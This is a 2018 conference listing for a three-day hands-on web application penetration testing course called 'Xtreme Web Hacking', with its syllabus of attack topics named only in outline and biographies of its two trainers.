- Xtreme Web Hacking
Xtreme Web Hacking
Riyaz Walikar & Bharath Kumar, Appsecco
Trainer Name: Riyaz Walikar & Bharath Kumar, Appsecco
Title:Xtreme Web Hacking
Duration: 3 Days
Dates: 20th - 22nd June 2018
What to expect?
- Completely hands-on, intense, fast paced learning using a combination of scenarios, case studies, hacker tools.
- Attacking applications using specialized tools and custom scripts that you will be writing over the three days.
- Coverage of vulnerabilities across platforms like Java, PHP, .net, Python, Rails and more
- A custom CTF to end the three days of training
- Complete documentation of the attacks and virtual machines with multiple networks
Skill and knowledge required (Pre-requisites)
- You should be a web application penetration tester. Although we will cover some basics on Day 1, this should not be considered a beginner level course
- Ability and familiarity of command line on Windows and Linux
- Familiarity with the OWASP Top 10 2013 and OWASP Top 10 2017
What you will need to bring?
- A laptop with administrator privileges
- 10 GB of free Hard Disk Space
- Ideally 8 GB of RAM but minimum 4 GB
- Laptop should have a working wireless and wired/Ethernet connection
- Laptop should support hardware-based virtualization
- If your laptop can run a virtual machine in Oracle Virtualbox it should work
- Other virtualization software might work but we will not be able to provide support for that.
What not to expect?
- A lot of hand holding about basic concepts already mentioned in the things you should be familiar with
- A lot of theory. This is meant to be a completely hands-on training!!
- To become an accomplished hacker in a day
What you will get?
- Tools, virtual machines and software provided for the training
- Completely documented script and programs
- A simple to follow step by step walk through of the entire training in a PDF file
- Virtual machines with code used during the training so that you can even practice after the training is over
This 3-day hands-on training will cover the tools and techniques that an attacker can use to detect, identify and exploit web application security weaknesses to eventually gain access to user data or the underlying operating system itself.
Basics of Hyper Text Transfer Protocol
- Understanding the HTTP protocol and getting familiar with requests, responses, headers and parameters
Setting Up Interception Proxy
- Setting up Interception Proxy to work with requests and responses and automating attacks using proxy features
OWASP Top 10 2017
- Hands-On with the latest OWASP Top 10, except A10
Domain reconnaissance and OSINT
- Gathering information about domains and sub-domains. Using tools to discover potentially vulnerable sub domains
Advanced database injection attacks
- Advanced injection attacks including automating data exfiltration using second Order SQL Injection
Injection and exploitation with NoSQL databases
- Application attacks and data exfiltration in NoSQL databases like MongoDB
Insecure Direct Object References
- Using Path traversal and file inclusion vulnerabilities to read interesting files and execute shell commands on the server
- Attacking weakly implemented serialization/deserialization functions to take control of web applications and the underlying server
XSS for the modern pentester
- Bypassing client and server-side filters to perform CSRF token and session hijacking stealing attacks
Attacking SOP and CORS
- Multiple topics will be covered under this section that will allow candidates to visualize attack origins for different kinds of XSS. Also, breaking/bypassing of regular expression-based filters will also be covered that will allow the candidate to execute XSS vectors using CORS
Attacking file upload functionality
- Bypassing well defined file upload functionalities using nuances in how files are treated on the server
Attacks on Authentication schemes
- Multiple attacks on SAML, OAuth and JWT will be covered to demonstrate common security misconfigurations
XML External Entity Attacks
- Attacking server-side controls to leak file information and exfiltrate data using XXE attacks
Attacking Server-Side Templating
- Abusing server-side templating to inject code that allows for data leaks on the server and server-side code execution
Attacking common crypto implementations in web applications
- Multiple attacks around Padding Oracle and Hash Length Extensions will be covered to demonstrate weaknesses arising out of using insecure options
Server-Side Request Forgery/Cross Site Port Attacks
- Using SSRF/XSPA to read internal files, gain access to interesting data and discover additional servers and applications
Gaining shell access to execute server-side system commands
- Creating web-shells on the server as footholds and setting up stable bash shells to provide a channel to transfer data and execute commands on the server
Pivoting to Internal networks
- Setting up access to internal networks using tools and techniques that would allow access to servers and applications not visible from the Internet
Capture the Flag style assessment
- Post training assessment to gauge how much did the candidates grasp and identify potential areas for improvement. This allows for candidates to apply all that they have learnt over the last three days and solve the tasks at hand
Profile of Riyaz Walikar
Chief Offensive Security Officer, Appsecco
Riyaz Walikar is a OSCP certified Web Application Pentester, Security evangelist and researcher. He has been active in the security community for the better part of the last 10 years. He has been actively involved with the Bangalore OWASP and null chapter for the last 7 years and is one of the OWASP and null Bangalore chapter leads.
He is actively involved with Vulnerability Research in popular Web Applications and Network aware services and has disclosed several security issues in popular software like Apache Archiva, Openfire, Joomla!, EJabberd, .NET Script Injection Bypass and has had luck with finding vulnerabilities with popular web applications like Facebook, Twitter, Google, Cisco, Symantec, Mozilla, PayPal, Ebay, Apigee, Yahoo, Adobe, Tumblr, Pinterest etc. for which he is on the Hall of Fame for most of these services. He has also been a speaker and trainer at several security conferences including OWASP AppsecUSA 2012, BlackHat Abu Dhabi 2012, Las Vegas 2015, EU 2015, nullcon 2012, 2013, 2014, 2015, 2016 and 2017, DefCon Las Vegas 2016 and c0c0n 2011,2013,2015 and 2016.
His technical interests lie with programming, bug bounty, malware analysis, breaking web applications, playing CTFs, researching devices that fall under the Internet of Things category and penetration testing networks exposed to the Internet. When he is not writing/breaking code, you can find him dabbling in photography, stargazing, playing football, reading or fishing.
Some of the trainings/workshops by Riyaz Walikar include
- Web Security Testing 101 at Govt. Dept., Bangalore 2017
- Secure Web Programming 2-day training at HackerRank Bangalore 2017
- Xtreme Web Hacking at NULLCON Goa 2012, 2013, 2014, 2015, 2016
- Cloud Security for Devs & Ops – NULLCON 2017
- Ninja Level Infrastructure Monitoring – DefCon 2016
- Ninja Level Infrastructure Monitoring – DefCon 2016
- Xtreme Web Hacking (CTF Style) – c0c0n 2015, 2016, 2017
Some of the talks given by Riyaz Walikar include
- A Pentester's Methodology to Discover and Exploit Windows Privilege Escalation flaws – c0c0n 2015, nullcon 2016
- Esoteric XSS Payloads – c0c0n 2016
- The Whys and Hows of Cyber Attacks – SAP Security Summit, Bangalore 2016
- Pentesting an ELK Stack – DevOpsDays India, Bangalore 2016
- Poking Servers with Facebook – AppsecUSA 2012, BlackHat Abu Dhabi 2012, c0c0n 2013
- Threats with Online Gaming – c0c0n 2017
- Linked In: linkedin.com/in/riyazw
- Twitter: @riyazwalikar and @wincmdfu
Profile of Bharath Kumar
Security Engineer, Appsecco
Bharath is a Security Engineer at Appsecco. He is an Offensive Security Certified Professional(OSCP).
Bharath is an open source evangelist with a strong passion for information security and building solutions that solve real world problems.
He has strong experience in client facing consulting assessments and building implementable automation tools to solve the security needs for companies and organisations in sectors ranging from financial services to healthcare.
Bharath is an active member and contributor at various security and developer communities including null open security community and Python Malaysia User Group.
Bharath has presented at many security and developer conferences including Bsides Delhi, Bugcrowd LevelUp, PyCon India and FUDCon.
His technical interest lies in application security, infrastructure security, OSINT, protocol security and programming. When not fiddling with technology he enjoys volunteering, hiking, stargazing or reading books.
Some of the talks given by Bharath include
- “Doing recon like it’s 2017!” - Bsides Delhi 2017
- “Esoteric sub-domain enumeration” - Bugcrowd LevelUp 2017
- “Python for Penetration Testers” Pycon India 2013
- Linked Inlinkedin.com/in/yamakira/
- Twitter: @yamakira_